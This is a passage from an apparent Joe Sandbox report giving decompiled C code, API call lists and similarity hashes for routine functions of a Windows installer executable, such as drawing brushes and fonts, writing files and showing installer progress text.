                                  					_v16.lbStyle = _t49[2];
                                  					_t40 = _t49[3];
                                  					if(_t40 != 0) {
                                  						DeleteObject(_t40);
                                  					}
                                  					_t49[3] = CreateBrushIndirect( &_v16);
                                  				}
                                  				return _t49[3];
                                  			}









                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                  • Instruction ID: 22809f81b89203674e666fe58c9753c9cc5a050007085b97ca1eded3a3c5a137
                                  • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                  • Instruction Fuzzy Hash: 27219671904705ABCB219F78DD08B5BBFF8AF01715F048669F996E22E0D738EA08CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0040268D(struct _OVERLAPPED* __ebx) {
                                  				void* _t27;
                                  				long _t32;
                                  				struct _OVERLAPPED* _t47;
                                  				void* _t51;
                                  				void* _t53;
                                  				void* _t56;
                                  				void* _t57;
                                  				void* _t58;
                                  
                                  				_t47 = __ebx;
                                  				 *(_t58 - 8) = 0xfffffd66;
                                  				_t52 = E00402A07(0xfffffff0);
                                  				 *(_t58 - 0x44) = _t24;
                                  				if(E004056B2(_t52) == 0) {
                                  					E00402A07(0xffffffed);
                                  				}
                                  				E00405821(_t52);
                                  				_t27 = E00405846(_t52, 0x40000000, 2);
                                  				 *(_t58 + 8) = _t27;
                                  				if(_t27 != 0xffffffff) {
                                  					_t32 =  *0x42ebb4; // 0x8c00
                                  					 *(_t58 - 0x30) = _t32;
                                  					_t51 = GlobalAlloc(0x40, _t32);
                                  					if(_t51 != _t47) {
                                  						E004030C0(_t47);
                                  						E0040308E(_t51,  *(_t58 - 0x30));
                                  						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                  						 *(_t58 - 0x2c) = _t56;
                                  						if(_t56 != _t47) {
                                  							E00402E6C( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                  							while( *_t56 != _t47) {
                                  								_t49 =  *_t56;
                                  								_t57 = _t56 + 8;
                                  								 *(_t58 - 0x38) =  *_t56;
                                  								E00405801( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                  								_t56 = _t57 +  *(_t58 - 0x38);
                                  							}
                                  							GlobalFree( *(_t58 - 0x2c));
                                  						}
                                  						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 8, _t47);
                                  						GlobalFree(_t51);
                                  						 *(_t58 - 8) = E00402E6C(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                  					}
                                  					CloseHandle( *(_t58 + 8));
                                  				}
                                  				_t53 = 0xfffffff3;
                                  				if( *(_t58 - 8) < _t47) {
                                  					_t53 = 0xffffffef;
                                  					DeleteFileA( *(_t58 - 0x44));
                                  					 *((intOrPtr*)(_t58 - 4)) = 1;
                                  				}
                                  				_push(_t53);
                                  				E00401423();
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t58 - 4));
                                  				return 0;
                                  			}












                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00008C00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026E1
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026FD
                                  • GlobalFree.KERNEL32 ref: 00402736
                                  • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402748
                                  • GlobalFree.KERNEL32 ref: 0040274F
                                  • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402767
                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040277B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                  • String ID:
                                  • API String ID: 3294113728-0
                                  • Opcode ID: aa0e477bcc705a69a8995f502b88efa21aa2dc7506c02b0781f8c30215ed14f3
                                  • Instruction ID: 0916882698d777068a17293f0a109363b50d7816b2f78cc6e62ac313510dd3fa
                                  • Opcode Fuzzy Hash: aa0e477bcc705a69a8995f502b88efa21aa2dc7506c02b0781f8c30215ed14f3
                                  • Instruction Fuzzy Hash: E5319F71C00128BBDF216FA5CD89DAE7E79EF05364F20423AF920762E1C7795D408BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404EA5(CHAR* _a4, CHAR* _a8) {
                                  				struct HWND__* _v8;
                                  				signed int _v12;
                                  				CHAR* _v32;
                                  				long _v44;
                                  				int _v48;
                                  				void* _v52;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				CHAR* _t26;
                                  				signed int _t27;
                                  				CHAR* _t28;
                                  				long _t29;
                                  				signed int _t39;
                                  
                                  				_t26 =  *0x42e384; // 0x0
                                  				_v8 = _t26;
                                  				if(_t26 != 0) {
                                  					_t27 =  *0x42ec54; // 0x0
                                  					_v12 = _t27;
                                  					_t39 = _t27 & 0x00000001;
                                  					if(_t39 == 0) {
                                  						E00405BBA(0, _t39, 0x429800, 0x429800, _a4);
                                  					}
                                  					_t26 = lstrlenA(0x429800);
                                  					_a4 = _t26;
                                  					if(_a8 == 0) {
                                  						L6:
                                  						if((_v12 & 0x00000004) == 0) {
                                  							_t26 = SetWindowTextA( *0x42e368, 0x429800);
                                  						}
                                  						if((_v12 & 0x00000002) == 0) {
                                  							_v32 = 0x429800;
                                  							_v52 = 1;
                                  							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                  							_v44 = 0;
                                  							_v48 = _t29 - _t39;
                                  							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                  							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                  						}
                                  						if(_t39 != 0) {
                                  							_t28 = _a4;
                                  							 *((char*)(_t28 + 0x429800)) = 0;
                                  							return _t28;
                                  						}
                                  					} else {
                                  						_t26 =  &(_a4[lstrlenA(_a8)]);
                                  						if(_t26 < 0x800) {
                                  							_t26 = lstrcatA(0x429800, _a8);
                                  							goto L6;
                                  						}
                                  					}
                                  				}
                                  				return _t26;
                                  			}


















                                  APIs
                                  • lstrlenA.KERNEL32(00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
                                  • lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
                                  • lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,74D0EA30), ref: 00404F01
                                  • SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
                                  • SendMessageA.USER32 ref: 00404F39
                                  • SendMessageA.USER32 ref: 00404F53
                                  • SendMessageA.USER32 ref: 00404F61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2531174081-0
                                  • Opcode ID: c9083a636ea0aba9f6a344c430bd940ed2e4200957790827e4701f34104d4c6e
                                  • Instruction ID: 2f329427c1d46a6eb49e6b4738c3ca031e5b71a6493834ff03b3c934a5869de4
                                  • Opcode Fuzzy Hash: c9083a636ea0aba9f6a344c430bd940ed2e4200957790827e4701f34104d4c6e
                                  • Instruction Fuzzy Hash: 1F215CB1900118BADF119FA5DC80E9EBFB9FF45354F14807AF904B62A1C7789E41CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404770(struct HWND__* _a4, intOrPtr _a8) {
                                  				long _v8;
                                  				signed char _v12;
                                  				unsigned int _v16;
                                  				void* _v20;
                                  				intOrPtr _v24;
                                  				long _v56;
                                  				void* _v60;
                                  				long _t15;
                                  				unsigned int _t19;
                                  				signed int _t25;
                                  				struct HWND__* _t28;
                                  
                                  				_t28 = _a4;
                                  				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                  				if(_a8 == 0) {
                                  					L4:
                                  					_v56 = _t15;
                                  					_v60 = 4;
                                  					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                  					return _v24;
                                  				}
                                  				_t19 = GetMessagePos();
                                  				_v16 = _t19 >> 0x10;
                                  				_v20 = _t19;
                                  				ScreenToClient(_t28,  &_v20);
                                  				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                  				if((_v12 & 0x00000066) != 0) {
                                  					_t15 = _v8;
                                  					goto L4;
                                  				}
                                  				return _t25 | 0xffffffff;
                                  			}















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                  • Instruction ID: 692a8fbc4ab4c19ca7eb206a77325c926543f9b55c82df0cde7f20f300a3092d
                                  • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                  • Instruction Fuzzy Hash: 49015275D00219BADB01DBA5DC45FFEBBBCAF55B11F10412BBA10B72C0C7B465018BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402B4C(struct HWND__* _a4, intOrPtr _a8) {
                                  				char _v68;
                                  				int _t11;
                                  				int _t20;
                                  
                                  				if(_a8 == 0x110) {
                                  					SetTimer(_a4, 1, 0xfa, 0);
                                  					_a8 = 0x113;
                                  				}
                                  				if(_a8 == 0x113) {
                                  					_t20 =  *0x414bc8; // 0x3fc1c
                                  					_t11 =  *0x428bd8; // 0x41480
                                  					if(_t20 >= _t11) {
                                  						_t20 = _t11;
                                  					}
                                  					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                  					SetWindowTextA(_a4,  &_v68);
                                  					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                  				}
                                  				return 0;
                                  			}







                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
                                  • MulDiv.KERNEL32(0003FC1C,00000064,00041480), ref: 00402B92
                                  • wsprintfA.USER32 ref: 00402BA2
                                  • SetWindowTextA.USER32(?,?), ref: 00402BB2
                                  • SetDlgItemTextA.USER32 ref: 00402BC4
                                  Strings
                                  • verifying installer: %d%%, xrefs: 00402B9C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: c26ab94ce710109fae0aeb594136b964e4d404ed4db4c01ad1bdf6ee359589c4
                                  • Instruction ID: 7934417d2aa742b95e7c6aae042493f9aa22ef4d350393a5f66c8f789a822ef4
                                  • Opcode Fuzzy Hash: c26ab94ce710109fae0aeb594136b964e4d404ed4db4c01ad1bdf6ee359589c4
                                  • Instruction Fuzzy Hash: 81014F70640208BBEF249F60DC49EAE3B79EB00305F008039FA06E92D0D7B8A9518F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00401D26() {
                                  				void* __esi;
                                  				int _t7;
                                  				signed char _t13;
                                  				struct HFONT__* _t16;
                                  				void* _t20;
                                  				struct HDC__* _t26;
                                  				void* _t28;
                                  				void* _t30;
                                  
                                  				_t26 = GetDC( *(_t30 - 0x34));
                                  				_t7 = GetDeviceCaps(_t26, 0x5a);
                                  				0x40afc8->lfHeight =  ~(MulDiv(E004029EA(2), _t7, 0x48));
                                  				ReleaseDC( *(_t30 - 0x34), _t26);
                                  				 *0x40afd8 = E004029EA(3);
                                  				_t13 =  *((intOrPtr*)(_t30 - 0x14));
                                  				 *0x40afdf = 1;
                                  				 *0x40afdc = _t13 & 0x00000001;
                                  				 *0x40afdd = _t13 & 0x00000002;
                                  				 *0x40afde = _t13 & 0x00000004;
                                  				E00405BBA(_t20, _t26, _t28, "Times New Roman",  *((intOrPtr*)(_t30 - 0x20)));
                                  				_t16 = CreateFontIndirectA(0x40afc8);
                                  				_push(_t16);
                                  				_push(_t28);
                                  				E00405AF6();
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t30 - 4));
                                  				return 0;
                                  			}












                                  APIs
                                  • GetDC.USER32(?), ref: 00401D29
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                  • ReleaseDC.USER32 ref: 00401D56
                                  • CreateFontIndirectA.GDI32(0040AFC8), ref: 00401DA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                  • String ID: Times New Roman
                                  • API String ID: 3808545654-927190056
                                  • Opcode ID: aa9dc3adce9858671d5dba2cadb35a05a48f9df2347b8c60a3318e7a06823940
                                  • Instruction ID: c142ac7f18e80a92cd8e2978e7193c4b91d53847f6be053cad09bf3429225ebb
                                  • Opcode Fuzzy Hash: aa9dc3adce9858671d5dba2cadb35a05a48f9df2347b8c60a3318e7a06823940
                                  • Instruction Fuzzy Hash: 5A01FEB1945341BFEB0157B09F0AB9E3F75A715301F100435F102BA1E2C5791411DB2F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E1000182A(signed int __edx, void* __eflags, void* _a8, void* _a16) {
                                  				signed int _v8;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				char _v148;
                                  				void _t46;
                                  				void _t47;
                                  				signed int _t48;
                                  				signed int _t49;
                                  				signed int _t58;
                                  				signed int _t59;
                                  				signed int _t61;
                                  				signed int _t62;
                                  				void* _t68;
                                  				void* _t69;
                                  				void* _t70;
                                  				void* _t71;
                                  				void* _t72;
                                  				signed int _t78;
                                  				void* _t82;
                                  				signed int _t86;
                                  				signed int _t88;
                                  				signed int _t91;
                                  				void* _t102;
                                  
                                  				_t86 = __edx;
                                  				 *0x1000405c = _a8;
                                  				_t78 = 0;
                                  				 *0x10004060 = _a16;
                                  				_v8 = 0;
                                  				_a16 = E1000123B();
                                  				_a8 = E1000123B();
                                  				_t91 = E1000131B(_a16);
                                  				_t82 = _a8;
                                  				_t88 = _t86;
                                  				_t46 =  *_t82;
                                  				if(_t46 != 0x7e && _t46 != 0x21) {
                                  					_v16 = E1000123B();
                                  					_t78 = E1000131B(_t75);
                                  					_v8 = _t86;
                                  					GlobalFree(_v16);
                                  					_t82 = _a8;
                                  				}
                                  				_t47 =  *_t82;
                                  				_t102 = _t47 - 0x2f;
                                  				if(_t102 > 0) {
                                  					_t48 = _t47 - 0x3c;
                                  					__eflags = _t48;
                                  					if(_t48 == 0) {
                                  						__eflags =  *((char*)(_t82 + 1)) - 0x3c;
                                  						if( *((char*)(_t82 + 1)) != 0x3c) {
                                  							__eflags = _t88 - _v8;
                                  							if(__eflags > 0) {
                                  								L54:
                                  								_t49 = 0;
                                  								__eflags = 0;
                                  								L55:
                                  								asm("cdq");
                                  								L56:
                                  								_t91 = _t49;
                                  								_t88 = _t86;
                                  								L57:
                                  								E10001446(_t86, _t91, _t88,  &_v148);
                                  								E10001278( &_v148);
                                  								GlobalFree(_a16);
                                  								return GlobalFree(_a8);
                                  							}
                                  							if(__eflags < 0) {
                                  								L47:
                                  								__eflags = 0;
                                  								L48:
                                  								_t49 = 1;
                                  								goto L55;
                                  							}
                                  							__eflags = _t91 - _t78;
                                  							if(_t91 < _t78) {
                                  								goto L47;
                                  							}
                                  							goto L54;
                                  						}
                                  						_t86 = _t88;
                                  						_t49 = E10002C90(_t91, _t78, _t86);
                                  						goto L56;
                                  					}
                                  					_t58 = _t48 - 1;
                                  					__eflags = _t58;
                                  					if(_t58 == 0) {
                                  						__eflags = _t91 - _t78;
                                  						if(_t91 != _t78) {
                                  							goto L54;
                                  						}
                                  						__eflags = _t88 - _v8;
                                  						if(_t88 != _v8) {
                                  							goto L54;
                                  						}
                                  						goto L47;
                                  					}
                                  					_t59 = _t58 - 1;
                                  					__eflags = _t59;
                                  					if(_t59 == 0) {
                                  						__eflags =  *((char*)(_t82 + 1)) - 0x3e;
                                  						if( *((char*)(_t82 + 1)) != 0x3e) {
                                  							__eflags = _t88 - _v8;
                                  							if(__eflags < 0) {
                                  								goto L54;
                                  							}
                                  							if(__eflags > 0) {
                                  								goto L47;
                                  							}
                                  							__eflags = _t91 - _t78;
                                  							if(_t91 <= _t78) {
                                  								goto L54;
                                  							}
                                  							goto L47;
                                  						}
                                  						_t86 = _t88;
                                  						_t49 = E10002CB0(_t91, _t78, _t86);
                                  						goto L56;
                                  					}
                                  					_t61 = _t59 - 0x20;
                                  					__eflags = _t61;
                                  					if(_t61 == 0) {
                                  						_t91 = _t91 ^ _t78;
                                  						_t88 = _t88 ^ _v8;
                                  						goto L57;
                                  					}
                                  					_t62 = _t61 - 0x1e;
                                  					__eflags = _t62;
                                  					if(_t62 == 0) {
                                  						__eflags =  *((char*)(_t82 + 1)) - 0x7c;
                                  						if( *((char*)(_t82 + 1)) != 0x7c) {
                                  							_t91 = _t91 | _t78;
                                  							_t88 = _t88 | _v8;
                                  							goto L57;
                                  						}
                                  						__eflags = _t91 | _t88;
                                  						if((_t91 | _t88) != 0) {
                                  							goto L47;
                                  						}
                                  						__eflags = _t78 | _v8;
                                  						if((_t78 | _v8) != 0) {
                                  							goto L47;
                                  						}
                                  						goto L54;
                                  					}
                                  					__eflags = _t62 == 0;
                                  					if(_t62 == 0) {
                                  						_t91 =  !_t91;
                                  						_t88 =  !_t88;
                                  					}
                                  					goto L57;
                                  				}
                                  				if(_t102 == 0) {
                                  					L21:
                                  					__eflags = _t78 | _v8;
                                  					if((_t78 | _v8) != 0) {
                                  						_v20 = E10002B20(_t91, _t88, _t78, _v8);
                                  						_v16 = _t86;
                                  						_t49 = E10002BD0(_t91, _t88, _t78, _v8);
                                  						_t82 = _a8;
                                  					} else {
                                  						_v20 = _v20 & 0x00000000;
                                  						_v16 = _v16 & 0x00000000;
                                  						_t49 = _t91;
                                  						_t86 = _t88;
                                  					}
                                  					__eflags =  *_t82 - 0x2f;
                                  					if( *_t82 != 0x2f) {
                                  						goto L56;
                                  					} else {
                                  						_t91 = _v20;
                                  						_t88 = _v16;
                                  						goto L57;
                                  					}
                                  				}
                                  				_t68 = _t47 - 0x21;
                                  				if(_t68 == 0) {
                                  					_t49 = 0;
                                  					__eflags = _t91 | _t88;
                                  					if((_t91 | _t88) != 0) {
                                  						goto L55;
                                  					}
                                  					goto L48;
                                  				}
                                  				_t69 = _t68 - 4;
                                  				if(_t69 == 0) {
                                  					goto L21;
                                  				}
                                  				_t70 = _t69 - 1;
                                  				if(_t70 == 0) {
                                  					__eflags =  *((char*)(_t82 + 1)) - 0x26;
                                  					if( *((char*)(_t82 + 1)) != 0x26) {
                                  						_t91 = _t91 & _t78;
                                  						_t88 = _t88 & _v8;
                                  						goto L57;
                                  					}
                                  					__eflags = _t91 | _t88;
                                  					if((_t91 | _t88) == 0) {
                                  						goto L54;
                                  					}
                                  					__eflags = _t78 | _v8;
                                  					if((_t78 | _v8) == 0) {
                                  						goto L54;
                                  					}
                                  					goto L47;
                                  				}
                                  				_t71 = _t70 - 4;
                                  				if(_t71 == 0) {
                                  					_t49 = E10002AE0(_t91, _t88, _t78, _v8);
                                  					goto L56;
                                  				} else {
                                  					_t72 = _t71 - 1;
                                  					if(_t72 == 0) {
                                  						_t91 = _t91 + _t78;
                                  						asm("adc edi, [ebp-0x4]");
                                  					} else {
                                  						if(_t72 == 0) {
                                  							_t91 = _t91 - _t78;
                                  							asm("sbb edi, [ebp-0x4]");
                                  						}
                                  					}
                                  					goto L57;
                                  				}
                                  			}



























                                  APIs
                                    • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                    • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                  • GlobalFree.KERNEL32 ref: 1000188C
                                  • GlobalFree.KERNEL32 ref: 10001A18
                                  • GlobalFree.KERNEL32 ref: 10001A1D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: FreeGlobal$lstrcpy
                                  • String ID:
                                  • API String ID: 176019282-0
                                  • Opcode ID: 4614ed1b287cbce5bbde6973ecf19ce2fdc55db5ca3753ae9986d2bfd743fe8c
                                  • Instruction ID: b3b2127d6fa55a06a2500fd1685b4752a9dc59771af94d5312cfae8ee0bfb045
                                  • Opcode Fuzzy Hash: 4614ed1b287cbce5bbde6973ecf19ce2fdc55db5ca3753ae9986d2bfd743fe8c
                                  • Instruction Fuzzy Hash: E051D332D04159AAFB21DFA4C8A16EEBBF5EB453D0F22416AE805E311DC635AF01DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401CCC(int __edx) {
                                  				void* _t17;
                                  				struct HINSTANCE__* _t21;
                                  				struct HWND__* _t25;
                                  				void* _t27;
                                  
                                  				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
                                  				GetClientRect(_t25, _t27 - 0x40);
                                  				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A07(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
                                  				if(_t17 != _t21) {
                                  					DeleteObject(_t17);
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t27 - 4));
                                  				return 0;
                                  			}








                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: d56188219697d5a9022e48a5b127ed1ab16f4984756dd3b6fdcb6bca33d64de9
                                  • Instruction ID: f7f1d63128c079cdfc256ea0cddfbe125cd0bfb1103d38193b94d487dccf8fd6
                                  • Opcode Fuzzy Hash: d56188219697d5a9022e48a5b127ed1ab16f4984756dd3b6fdcb6bca33d64de9
                                  • Instruction Fuzzy Hash: 89F0FFB2A05114AFE701EBA4EE89DAFB7BCEB44301B104576F501F2191C674AD018B79
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E0040468E(int _a4, intOrPtr _a8, unsigned int _a12) {
                                  				char _v36;
                                  				char _v68;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t26;
                                  				void* _t34;
                                  				signed int _t36;
                                  				signed int _t39;
                                  				unsigned int _t46;
                                  
